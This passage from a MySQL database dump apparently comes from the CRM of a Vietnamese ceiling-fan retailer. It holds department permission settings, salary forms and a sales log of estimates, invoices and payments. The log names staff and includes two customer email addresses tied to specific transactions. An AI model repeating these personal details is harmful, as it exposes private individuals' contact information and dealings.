(3, 'Bộ phận  Mua hàng - XNK', 'a:22:{s:9:\"contracts\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:12:\"credit_notes\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:9:\"customers\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:9:\"estimates\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"expenses\";a:1:{i:0;s:8:\"view_own\";}s:8:\"invoices\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"items\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:14:\"knowledge_base\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"projects\";a:6:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";i:4;s:17:\"create_milestones\";i:5;s:15:\"edit_milestones\";}s:9:\"proposals\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:7:\"reports\";a:1:{i:0;s:4:\"view\";}s:5:\"roles\";a:1:{i:0;s:4:\"view\";}s:5:\"staff\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:13:\"subscriptions\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:5:\"tasks\";a:8:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";i:4;s:14:\"edit_timesheet\";i:5;s:18:\"edit_own_timesheet\";i:6;s:16:\"delete_timesheet\";i:7;s:20:\"delete_own_timesheet\";}s:16:\"estimate_request\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"leads\";a:1:{i:0;s:4:\"view\";}s:7:\"surveys\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:12:\"appointments\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:3:\"hrm\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:9:\"warehouse\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:5:\"goals\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}}'),
(4, 'Bộ phận Kỹ Thuật', 'a:22:{s:9:\"contracts\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:12:\"credit_notes\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:9:\"customers\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:9:\"estimates\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"expenses\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"invoices\";a:2:{i:0;s:4:\"view\";i:1;s:6:\"create\";}s:5:\"items\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:14:\"knowledge_base\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:8:\"payments\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"projects\";a:7:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";i:4;s:17:\"create_milestones\";i:5;s:15:\"edit_milestones\";i:6;s:17:\"delete_milestones\";}s:9:\"proposals\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:8:\"settings\";a:1:{i:0;s:4:\"view\";}s:13:\"subscriptions\";a:4:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:5:\"tasks\";a:8:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";i:4;s:14:\"edit_timesheet\";i:5;s:18:\"edit_own_timesheet\";i:6;s:16:\"delete_timesheet\";i:7;s:20:\"delete_own_timesheet\";}s:19:\"checklist_templates\";a:2:{i:0;s:6:\"create\";i:1;s:6:\"delete\";}s:16:\"estimate_request\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"leads\";a:1:{i:0;s:4:\"view\";}s:7:\"surveys\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:12:\"appointments\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:9:\"warehouse\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"purchase\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"goals\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}}'),
(5, 'Bộ phận Kế Toán Nhân Sự', 'a:35:{s:9:\"contracts\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:12:\"credit_notes\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:9:\"customers\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:9:\"estimates\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:8:\"expenses\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:8:\"invoices\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"items\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:14:\"knowledge_base\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"payments\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"projects\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:9:\"proposals\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:7:\"reports\";a:1:{i:0;s:4:\"view\";}s:5:\"roles\";a:1:{i:0;s:4:\"view\";}s:8:\"settings\";a:1:{i:0;s:4:\"view\";}s:5:\"staff\";a:1:{i:0;s:4:\"view\";}s:13:\"subscriptions\";a:1:{i:0;s:8:\"view_own\";}s:5:\"tasks\";a:5:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:14:\"edit_timesheet\";i:4;s:18:\"edit_own_timesheet\";}s:19:\"checklist_templates\";a:2:{i:0;s:6:\"create\";i:1;s:6:\"delete\";}s:16:\"estimate_request\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"leads\";a:1:{i:0;s:4:\"view\";}s:7:\"surveys\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:12:\"appointments\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:3:\"hrm\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:9:\"warehouse\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:20:\"accounting_dashboard\";a:1:{i:0;s:4:\"view\";}s:22:\"accounting_transaction\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:24:\"accounting_journal_entry\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:19:\"accounting_transfer\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:28:\"accounting_chart_of_accounts\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:20:\"accounting_reconcile\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:17:\"accounting_budget\";a:2:{i:0;s:4:\"view\";i:1;s:6:\"create\";}s:17:\"accounting_report\";a:1:{i:0;s:4:\"view\";}s:18:\"accounting_setting\";a:1:{i:0;s:4:\"view\";}s:8:\"purchase\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"goals\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}}');

-- --------------------------------------------------------

--
-- Table structure for table `tblsalary_form`
--

CREATE TABLE `tblsalary_form` (
  `form_id` int(10) UNSIGNED NOT NULL,
  `form_name` varchar(200) NOT NULL,
  `salary_val` decimal(15,2) NOT NULL,
  `tax` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsalary_form`
--

INSERT INTO `tblsalary_form` (`form_id`, `form_name`, `salary_val`, `tax`) VALUES
(1, 'Lương chính thức', 0.00, 0),
(2, 'Lương thử việc', 0.00, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblsales_activity`
--

CREATE TABLE `tblsales_activity` (
  `id` int(11) NOT NULL,
  `rel_type` varchar(20) DEFAULT NULL,
  `rel_id` int(11) NOT NULL,
  `description` text NOT NULL,
  `additional_data` text DEFAULT NULL,
  `staffid` varchar(11) DEFAULT NULL,
  `full_name` varchar(100) DEFAULT NULL,
  `date` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsales_activity`
--

INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(1, 'estimate', 1, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2021-12-28 08:59:39'),
(2, 'estimate', 1, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2021-12-28 14:12:45'),
(3, 'estimate', 1, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:127:\"Đường kính cánh: 152cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa  <br />\r\n\";i:1;s:105:\"Đường kính cánh: 152cm  \r\nĐộng cơ: BLDC motor, công suất 35W  \r\nBộ điều khiển từ xa\";}', '1', 'Ho Gia Phat', '2021-12-28 14:12:45'),
(5, 'estimate', 1, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:74:\"<a href=\"http://hgphome.com/admin/invoices/list_invoices/1\">INV-000001</a>\";}', NULL, '', '2021-12-28 16:57:08'),
(6, 'estimate', 1, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Quạt trần ABACUS 60\";}', '1', 'Ho Gia Phat', '2021-12-29 08:37:07'),
(7, 'estimate', 1, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:127:\"Đường kính cánh: 152cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa  <br />\r\n\";i:1;s:105:\"Đường kính cánh: 152cm  \r\nĐộng cơ: BLDC motor, công suất 35W  \r\nBộ điều khiển từ xa\";}', '1', 'Ho Gia Phat', '2021-12-29 12:50:54'),
(8, 'estimate', 1, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:42:\"Quạt trần HVLS - POWERFUL S3 SIZE 2.5M\";}', '1', 'Ho Gia Phat', '2021-12-29 12:52:03'),
(9, 'estimate', 2, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2021-12-30 10:08:54'),
(15, 'estimate', 1, 'not_estimate_invoice_deleted', '', '1', 'Ho Gia Phat', '2022-01-10 20:16:53'),
(17, 'estimate', 1, 'estimate_activity_converted', 'a:1:{i:0;s:74:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/2\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-01-11 22:22:30'),
(21, 'estimate', 2, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:127:\"Đường kính cánh: 152cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa  <br />\r\n\";i:1;s:105:\"Đường kính cánh: 152cm  \r\nĐộng cơ: BLDC motor, công suất 35W  \r\nBộ điều khiển từ xa\";}', '1', 'Ho Gia Phat', '2022-01-11 22:30:26'),
(22, 'estimate', 2, 'invoice_estimate_activity_sent_to_client', 'a:1:{i:0;s:56:\"<custom_data>thuylt@thuyltsolidinterior.vn</custom_data>\";}', '1', 'Ho Gia Phat', '2022-01-11 22:32:30'),
(23, 'estimate', 2, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:42:\"Quạt trần HVLS - POWERFUL S3 size 4.3m\";}', '1', 'Ho Gia Phat', '2022-01-12 11:47:23'),
(24, 'estimate', 2, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:23:\"Quạt trần ABACUS 60\";}', '1', 'Ho Gia Phat', '2022-01-12 11:47:23'),
(25, 'estimate', 2, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:53:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood\";}', '1', 'Ho Gia Phat', '2022-01-12 11:47:23'),
(26, 'estimate', 1, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:23:\"Quạt trần ABACUS 60\";}', '1', 'Ho Gia Phat', '2022-01-12 12:07:11'),
(27, 'estimate', 1, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:23:\"Quạt trần ABACUS 60\";}', '1', 'Ho Gia Phat', '2022-01-12 12:07:11'),
(28, 'estimate', 1, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:42:\"Quạt trần HVLS - POWERFUL S3 SIZE 2.5M\";}', '1', 'Ho Gia Phat', '2022-01-12 12:07:11'),
(29, 'estimate', 1, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-01-12 12:07:11'),
(30, 'estimate', 1, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:53:\"Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood\";}', '1', 'Ho Gia Phat', '2022-01-12 12:07:11'),
(31, 'estimate', 2, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-01-12 12:13:00'),
(32, 'estimate', 3, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-01-12 16:01:41'),
(34, 'estimate', 1, 'not_estimate_invoice_deleted', '', '1', 'Ho Gia Phat', '2022-01-13 00:13:34'),
(35, 'estimate', 3, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:12:\"153000000.00\";i:1;s:9:\"177850000\";}', '1', 'Ho Gia Phat', '2022-01-13 00:18:42'),
(36, 'estimate', 3, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:37:\"Quạt trần cánh lớn Essence 3m \";i:1;s:36:\"Quạt trần cánh lớn Essence 3m\";}', '1', 'Ho Gia Phat', '2022-01-13 00:18:42'),
(37, 'invoice', 3, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-01-13 00:18:53'),
(38, 'estimate', 3, 'estimate_activity_converted', 'a:1:{i:0;s:73:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/3\">INV-1-22</a>\";}', '1', 'Ho Gia Phat', '2022-01-13 00:18:53'),
(39, 'estimate', 3, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-01-14 08:14:31'),
(40, 'estimate', 4, 'estimate_activity_created', '', '6', 'Mỹ Anh ', '2022-01-14 10:51:37'),
(41, 'invoice', 4, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-01-14 12:01:04'),
(42, 'estimate', 4, 'estimate_activity_converted', 'a:1:{i:0;s:73:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/4\">INV-2-22</a>\";}', '1', 'Ho Gia Phat', '2022-01-14 12:01:04'),
(43, 'estimate', 5, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-01-14 13:35:53'),
(44, 'invoice', 5, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-14 13:38:08'),
(45, 'estimate', 5, 'estimate_activity_converted', 'a:1:{i:0;s:74:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/5\">INV-DRAFT</a>\";}', '3', 'Hieu Le', '2022-01-14 13:38:08'),
(46, 'invoice', 5, 'invoice_activity_sent_to_client', 'a:1:{i:0;s:42:\"<custom_data>congho@live.com</custom_data>\";}', '3', 'Hieu Le', '2022-01-14 13:47:42'),
(47, 'invoice', 5, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-14 13:48:18'),
(48, 'invoice', 5, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"13.650.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/1\" target=\"_blank\">#1</a>\";}', '3', 'Hieu Le', '2022-01-14 13:48:18'),
(49, 'invoice', 4, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-01-14 16:52:33'),
(50, 'invoice', 4, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.850.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/2\" target=\"_blank\">#2</a>\";}', '1', 'Ho Gia Phat', '2022-01-14 16:52:33'),
(51, 'invoice', 5, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-01-14 16:54:18'),
(52, 'invoice', 5, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:1:\"1\";i:1;s:13:\"13.650.000 đ\";}', '1', 'Ho Gia Phat', '2022-01-14 16:54:18'),
(53, 'estimate', 6, 'estimate_activity_created', '', '6', 'Mỹ Anh ', '2022-01-15 15:02:58'),
(54, 'invoice', 6, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-17 10:13:42'),
(55, 'invoice', 6, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-17 10:17:33'),
(56, 'invoice', 6, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"25.650.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/3\" target=\"_blank\">#3</a>\";}', '3', 'Hieu Le', '2022-01-17 10:17:33'),
(57, 'invoice', 7, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-17 10:24:08'),
(58, 'invoice', 8, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-17 14:11:29'),
(59, 'invoice', 8, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-17 14:13:05'),
(60, 'invoice', 8, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.600.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/4\" target=\"_blank\">#4</a>\";}', '3', 'Hieu Le', '2022-01-17 14:13:05'),
(61, 'invoice', 9, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-17 14:23:03'),
(62, 'invoice', 9, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-17 14:23:03'),
(63, 'invoice', 9, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-17 14:23:32'),
(64, 'invoice', 9, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.600.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/5\" target=\"_blank\">#5</a>\";}', '3', 'Hieu Le', '2022-01-17 14:23:32'),
(65, 'invoice', 10, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-18 14:09:07'),
(66, 'invoice', 10, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-18 14:09:07'),
(67, 'invoice', 10, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-18 14:10:17'),
(68, 'invoice', 10, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"15.015.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/6\" target=\"_blank\">#6</a>\";}', '3', 'Hieu Le', '2022-01-18 14:10:17'),
(69, 'invoice', 11, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-18 14:28:57'),
(70, 'invoice', 11, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-18 14:28:57'),
(71, 'invoice', 11, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-18 14:29:51'),
(72, 'invoice', 11, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"24.600.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/7\" target=\"_blank\">#7</a>\";}', '3', 'Hieu Le', '2022-01-18 14:29:51'),
(73, 'invoice', 12, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-18 14:59:24'),
(74, 'invoice', 12, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-18 14:59:24'),
(75, 'invoice', 12, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-18 14:59:38'),
(76, 'invoice', 12, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.600.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/8\" target=\"_blank\">#8</a>\";}', '3', 'Hieu Le', '2022-01-18 14:59:38'),
(77, 'estimate', 6, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '6', 'Mỹ Anh ', '2022-01-19 14:12:42'),
(78, 'invoice', 13, 'invoice_activity_created', '', '6', 'Mỹ Anh ', '2022-01-19 15:29:32'),
(79, 'estimate', 7, 'estimate_activity_created', '', '6', 'Mỹ Anh ', '2022-01-19 15:34:06'),
(80, 'estimate', 7, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"QUẠT TRẦN SINO LED 52 MAPLE WOOD\";}', '6', 'Mỹ Anh ', '2022-01-19 16:02:53'),
(81, 'estimate', 7, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:49:\"Quạt trần SINO LED 52 Brush Nickel Maple Wood\";}', '6', 'Mỹ Anh ', '2022-01-19 16:02:53'),
(82, 'invoice', 13, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"QUẠT TRẦN SINO LED 52 MAPLE WOOD\";}', '6', 'Mỹ Anh ', '2022-01-19 16:05:57'),
(83, 'invoice', 13, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:49:\"Quạt trần SINO LED 52 Brush Nickel Maple Wood\";}', '6', 'Mỹ Anh ', '2022-01-19 16:05:57'),
(84, 'estimate', 8, 'estimate_activity_created', '', '3', 'Hieu Le', '2022-01-19 16:41:59'),
(85, 'invoice', 14, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 08:52:57'),
(86, 'invoice', 14, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 08:52:57'),
(87, 'invoice', 14, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 08:53:20'),
(88, 'invoice', 14, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"31.450.000 đ\";i:1;s:77:\"<a href=\"https://hgphome.com/admin/payments/payment/9\" target=\"_blank\">#9</a>\";}', '3', 'Hieu Le', '2022-01-20 08:53:20'),
(89, 'invoice', 15, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 09:00:37'),
(90, 'invoice', 15, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 09:00:37'),
(91, 'invoice', 15, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 09:01:14'),
(92, 'invoice', 15, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/10\" target=\"_blank\">#10</a>\";}', '3', 'Hieu Le', '2022-01-20 09:01:14'),
(93, 'invoice', 16, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 09:07:32'),
(94, 'invoice', 16, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 09:12:05'),
(95, 'invoice', 16, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.900.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/11\" target=\"_blank\">#11</a>\";}', '3', 'Hieu Le', '2022-01-20 09:12:05'),
(96, 'invoice', 17, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 10:48:53'),
(97, 'invoice', 17, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 10:48:53'),
(98, 'invoice', 17, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 10:49:08'),
(99, 'invoice', 17, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"22.440.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/12\" target=\"_blank\">#12</a>\";}', '3', 'Hieu Le', '2022-01-20 10:49:08'),
(100, 'invoice', 18, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 10:58:23'),
(101, 'invoice', 18, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 10:58:23'),
(102, 'invoice', 18, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 10:58:43'),
(103, 'invoice', 18, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.880.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/13\" target=\"_blank\">#13</a>\";}', '3', 'Hieu Le', '2022-01-20 10:58:43'),
(104, 'invoice', 19, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '3', 'Hieu Le', '2022-01-20 11:13:48'),
(105, 'invoice', 19, 'invoice_activity_created', '', '3', 'Hieu Le', '2022-01-20 11:13:48'),
(106, 'invoice', 19, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '3', 'Hieu Le', '2022-01-20 11:14:15'),
